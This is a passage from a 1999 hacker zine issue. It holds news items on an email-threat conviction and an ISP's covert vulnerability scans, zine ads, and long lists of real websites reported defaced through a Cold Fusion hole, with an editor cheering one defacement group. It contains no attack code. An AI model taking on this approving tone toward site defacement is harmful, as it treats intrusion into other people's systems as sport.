the computer industry needs more and more hackers in order to advance
technology and solve current problems.
Media Misnomer Being a hacker does not mean you spend your time breaking
into computers. We can blame the journalistic community for grabbing hold
of what it perceived as a catchall term and deprecating the true meaning
of the word. The correct way to describe someone who circumvents computer
security is a system "cracker." These malcontents are well known for
breaking into the Pentagon, several defense contractors, various ISPs, and
other supposedly secure systems. They have shared classified documents on
the Net, given copy-protected software away, stolen credit card
information and, in the process, made the online community nervous. Most
of the system crackers I know are either in jail, have been in jail or are
going to jail.
When Hackers Grow Up
The hacker population will probably rise at the same rate as every other
profession, so a per-capita increase seems unlikely. The media might have
us believe otherwise, since even the least-newsworthy computer "hackers"
get tons of television exposure. If you want to join the elite group of
technophiles, there is no time like to present to start working on your
craft.
"Didn't you used to be a hacker before you were a geek?"; the wife
asks. "And what's the difference anyway?"
I'm not paying attention. Instead I'm looking at how I can replicate
the inode dataset on a ufs partition to an NTFS volume.
"Never mind," she sighs, "I just figured that one out on my own."
Jack Valko is the senior network manager for Buena Vista Internet Group,
which produces ABCNEWS.com.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
53.0 [ISN] Email threats could bring 10yr jail term
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: darek milewski <darekm@cmeasures.com>
http://www.news.com/News/Item/0,4,35560,00.html
Email threats earn conviction
By Dan Goodin
Staff Writer, CNET News.com
April 22, 1999, 6:45 p.m. PT
A Canadian man is facing up to 10 years in federal prison after being
found guilty of sending threatening emails to Microsoft chief executive
Bill Gates and a number of government officials, the U.S. attorney in
Seattle said.
Carl Edward Johnson, 49, of Bienfait, Saskatchewan, was convicted on
four felony counts in connection with the threats, some of which were
posted to a popular encryption mailing list using software that hides the
identity of the sender. His conviction wraps up a two-year investigation
by officials from the Treasury Department.
Johnson, who is scheduled for sentencing on June 11, is being held in
a federal detention center near Seattle. His attorney was not immediately
available for comment.
U.S. District Judge Robert Bryan found Johnson guilty of using the
Cypherpunks mailing list to threaten government officials, said assistant
U.S. attorney Floyd Short. The court found that Johnson in June of 1997
used an anonymous remailer to post a message offering a reward if someone
would kill a magistrate judge and several Treasury Department
investigators. The officials were involved in the criminal prosecution of
a man accused of illegally compiling names and addresses of employees at
the Internal Revenue Service and trying them in so-called common law
courts.
The court also found that Johnson posted messages threatening the
lives of three federal appeals court judges who are hearing a case
challenging government restrictions of the export of encryption software.
Johnson said the judges would end up in "a pine box or a body bag" if they
ruled against Chicago professor Daniel Bernstein, a plaintiff in the civil
case against the regulations, Short said.
Johnson also was convicted of sending email to Gates claiming the top
Microsoft executive's assassination was being planned.
Floyd said that investigators were able to learn Johnson's identity
by piecing together information he left on Web sites, in email messages,
and in his home. Interestingly, a key piece of evidence included what is
known as the public key in a program called Pretty Good Privacy, which is
designed to conceal a computer user's identity.
Johnson's conviction comes a week after federal investigators were
able to track down the man they allege anonymously posted a hoax news
story that caused the stock of a California company to rise more than 30
percent.
"People may feel they are anonymous on the Internet, and that's not
the case," Short said. "The level of understanding of the Internet is
rising quite a bit within law enforcement."
@HWA
54.0 [ISN] Singapore ISP scans customer computers for vulnerabilities
http://straitstimes.asia1.com/one1/one1.html
SINGAPORE (April 29, 1999 11:53 p.m. EDT http://www.nandotimes.com) -
Singapore's national telecommunications company has scanned more than
200,000 computers of its Internet customers without their knowledge as
part of a plan to ward off hackers, the Straits Times reported on Friday.
Singapore Telecom, which is 80 percent owned by the government, began the
scan last month of nearly half of Singapore's Internet users to check
whether its customers were vulnerable to hacker attacks, the report said.
The scanning would continue until all accounts of its SingNet and SingTel
Magix customers were covered, it said.
"We are merely protecting the interest of our customers," the report
quoted Singapore Telecom chief executive officer for multimedia Paul Chong
as saying.
SingNet had asked the Home Affairs Ministry's IT security unit to do the
scan following news in March of the arrest of two boys who had hacked into
17 SingNet customers' accounts.
Officials at Singapore Telecom were not immediately available for comment.
The disclosure from Chong came after the Straits Times reported on
Thursday that 21-year-old law student Anne Lee had complained to the
police that someone with an account in the Home Affairs Ministry had
hacked into her account.
Chong said SingTel was being "responsible" by giving customers the
"value-added service" of scanning their computers.
On whether the law allowed such scanning without customers' consent, Chong
said nothing illegal had taken place.
He said customers were not informed of the scan so as not to alarm them.
"We do not want to make a mountain out of a molehill. In the end, the scan
might not turn up anything. If we had informed the customers, it might
cause an alarm," Chong said.
He added that "real hackers might lie low" if they knew of the scan.
Chong was quoted as saying the scanning so far showed that some users were
vulnerable and that they would be informed when the process was over.
The Home Ministry was approached because it was the "expert" in the area
-- it helped crack the case of the two teenage hackers.
Chong stressed that the scan did not delve into users' computer databases,
or amount to an illegal entry into computer accounts, the Straits Times
reported.
"There is no invasion of privacy at all. Basically, what we did was check
if the systems had open windows through which hackers can exploit," Chong
said.
Chang Wai Leong, a SingTel director, was quoted in the report as
describing the scan as like a "policeman patrolling in cyberspace checking
if the "windows" of the computer system are opened."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
<img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
http:/ 99 http:o
http:/ login: sysadmin n99 httpi
/come. password: tp://comn
to/Can me.to/Cat
c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
http:/ industry people to attend with booths and talks. 99 http:e
/come. you could have a booth and presentation for the cost of p://comel
http:/ little more than a doorprize (tba) contact us at our main n99http:i
http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
http:/ for updates. This is the first Canadian event of its type invalid t
403 Fo and will have both white and black hat attendees, come out logged! !
404 Fi and shake hands with the other side... *g* mainly have some IP locked
ome.to fun and maybe do some networking (both kinds). see ya there! hostname
http:/ x99http:x
o/Canc x.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
<a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
@HWA
HOW.TO How to hack part 3
~~~~~~~~~~~~~~~~~~
To be continued (probably) in a future issue... if time permits
and inclination is prevelant. ie: if & when I feel like it.. :p
(discontinued until further notice)
Meanwhile read this:
http://www.nmrc.org/faqs/hackfaq/hackfaq.html
<a href="http://www.nmrc.org/faqs/hackfaq/hackfaq.html">Link</a>
And especially, this:
http://www.tuxedo.org/~esr/faqs/hacker-howto.html
<a href="http://www.tuxedo.org/~esr/faqs/hacker-howto.html">Link</a>
(published in its entirety in issue #12)
@HWA
SITE.1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
April 25th
From http://www.403-security.org/
3 sites got hacked by Moscow Security Team
Astral 25.04.1999 12:25
Today Moscow Security Team hacked 3 sites : lica.co.uk, fdfoto.com, tri-starmall.com. All sites had
same hacked index.htm and text on hacked sites were same :" I want to say: admin's of this site is very
lame!!!! This can't protect their site!Privet to all haX0rs grups from Russia, Moscow!:)) ". Archive of hack.
April 26th
From HNN rumours section;
contributed by Anonymous
Cracked
Cold Fusion is working its magic. Many of these sites
where recently reported cracked because of the hole in
Cold Fusion. Many have been done by group known as
Forpaxe. We are listing almost all of the reported sites
today just to show how widespread this problem is.
http://thresher1.gsfc.nasa.gov
http://www.bestmidwestmall.com
http://advances.com
http://www.bellanet.com
http://www.state.wv.us
http://www.ewic.org.uk
http://www.store.net
http://www.bankerusa.com
http://www.cleanteam.com
http://www.actcomm.com
http://www.pictureshow.com
http://www.mallworld.com/
http://www.huang.com/
http://www.digital2000.com/
http://www.autoshow.com/
http://www.usautoparts.com/
http://www.nationwidetrading.com/
http://www.jaamejam.com/
http://www.spiffest.com
http://www.pacificshorehotel.com/
http://www.thebeachsuites.com
http://www.tvbusa.com/
http://www.hotelcarmel.com
http://www.snakclub.com/
http://www.georgianhotel.com/
http://www.wwwonders.com/
http://ns1.wing.net
http://www.schoollink.net
http://geonorth.com
http://nmc.itc.virginia.edu/
http://orbit.unh.edu
http://www.ewic.org.uk
http://www.utrecht.nl
http://cddocs.fnal.gov
http://www.ultralert.com
http://www.sellnet.com.au
http://download.throbnet.com
http://www.athi.com.au
http://www.budgettravel.to
http://www.cargohold.com.au
http://www.councilexghanges.org.au
http://www.ellamaiden.com
http://www.howtoget.to
http://www.ibaustralia.com
http://www.interlink.asn.au
http://www.juster.com.au
http://www.motorart.com
http://www.offyourhead.com.au
http://www.siberiankitty.com
http://www.bicafe.com
http://www.nymfoseek.com
http://www.tucsonfiestabowl.com
http://www.game-online.com
http://www.giftedpeople.com/
http://www.braingate.com
http://www.state.co.us
http://mot.vuse.vanderbilt.edu
http://www.muchmusic.com
http://www.edunet.com
http://www.exn.ca
April 27th
contributed by Anonymous
Cracked
Cold Fusion sites are still being hit. Most of todays sites
are a result of the recently released Cold Fusion
problem. If you haven't patched your system yet you
better do so soon.
http://teamweb3.lbl.gov
http://herbb.hanscom.af.mil/index.htm
http://www.adultseek.net
http://www.vrgirls.com
http://www.vrsluts.com
http://www.towngreen.com
http://www.exn.ca
http://www.eaglebaytrading.com/
http://tri-starmall.com/
http://lica.co.uk/
http://fdfoto.com/
http://owk.nvart.ru/
http://www.cide.mx
http://www.state.id.us
http://www.diamondmm.com
http://www.state.sd.us
http://www.mwm.net
http://www.mwm.net/
http://www.adultkey.com/
http://www.1wrestling.com
http://www.3m.com
http://www.tay.ac.uk
April 28th
http://thayerstreet.org
http://jopa.hypermart.net/
http://www.ci.la.ca.us
http://www.parctechno.qc.ca/
http://ois.nist.gov/index.html
http://www.parctechno.qc.ca
April 29th
Via HNN rumours section http://www.hackernews.com/
contributed by Anonymous
Cracked
Admins have still not patched their Cold Fusuion sites.
Many of these reported cracks are a result of that hole.
http://www.ezcd.com
http://www.itar-tass.com
http://xre22.brooks.af.mil
http://www.powermanager.com
http://www.leg.state.fl.us
http://www.wcresa.k12.mi.us
http://www.users.sccoast.net
http://www.adult.ru
http://ois.nist.gov
http://www.airbed.com
http://www.houseit.com
http://www.hrsa.dhhs.gov
http://www.parctechno.qc.ca
http://www.roc.ru
http://www.thayerstreet.org
http://fa.havengames.net
http://los.extremeblizzard.com
http://wn.havengames.net
http://miraesoft.ugn3d.com
http://haven.extremeblizzard.com
http://www.computer-solutions.net
http://tgrc.ucdavis.edu/
April 30th
From HNN rumours section
contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://kenlince.dynip.com
http://this.gsfc.nasa.gov
http://www.academic.marist.edu
http://www.dos.gov.jo
http://www.secure-service.org
http://www.totalimageprinting.com
http://www.faa.gov - "Kosovo - stop the war" archived at http://www.403-security.org/Archive/Sploit/www.faa.gov.htm
http://www.recreation.gov
http://ns1.rrsan.com
http://hunain.fkm.utm.my
http://los.extremeblizzard.com
http://www.computer-solutions.net
http://newsnet.byu.edu
http://mama.uchsc.edu
http://www.cabp.com
http://www.brain3.com
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
Mirror sites:
~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/ <a href="http://bewoner.dma.be/cum/">Go there</a>
Brasil........: http://www.psynet.net/ka0z <a href="http://www.psynet.net/ka0z/">Go there</a>
http://www.elementais.cjb.net <a href="http://www.elementais.cjb.net/">Go there</a>
Columbia......: http://www.cascabel.8m.com <a href="http://www.cascabel.8m.com/">Go there</a>
http://www.intrusos.cjb.net <a href="http://www.intrusos.cjb.net">Go there</a>
Indonesia.....: http://www.k-elektronik.org/index2.html <a href="http://www.k-elektronik.org/index2.html">Go there</a>
http://members.xoom.com/neblonica/ <a href="http://members.xoom.com/neblonica/">Go there</a>
http://hackerlink.or.id/ <a href="http://hackerlink.or.id/">Go there</a>
Netherlands...: http://security.pine.nl/ <a href="http://security.pine.nl/">Go there</a>
Russia........: http://www.tsu.ru/~eugene/ <a href="http://www.tsu.ru/~eugene/">Go there</a>
Singapore.....: http://www.icepoint.com <a href="http://www.icepoint.com">Go there</a>
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]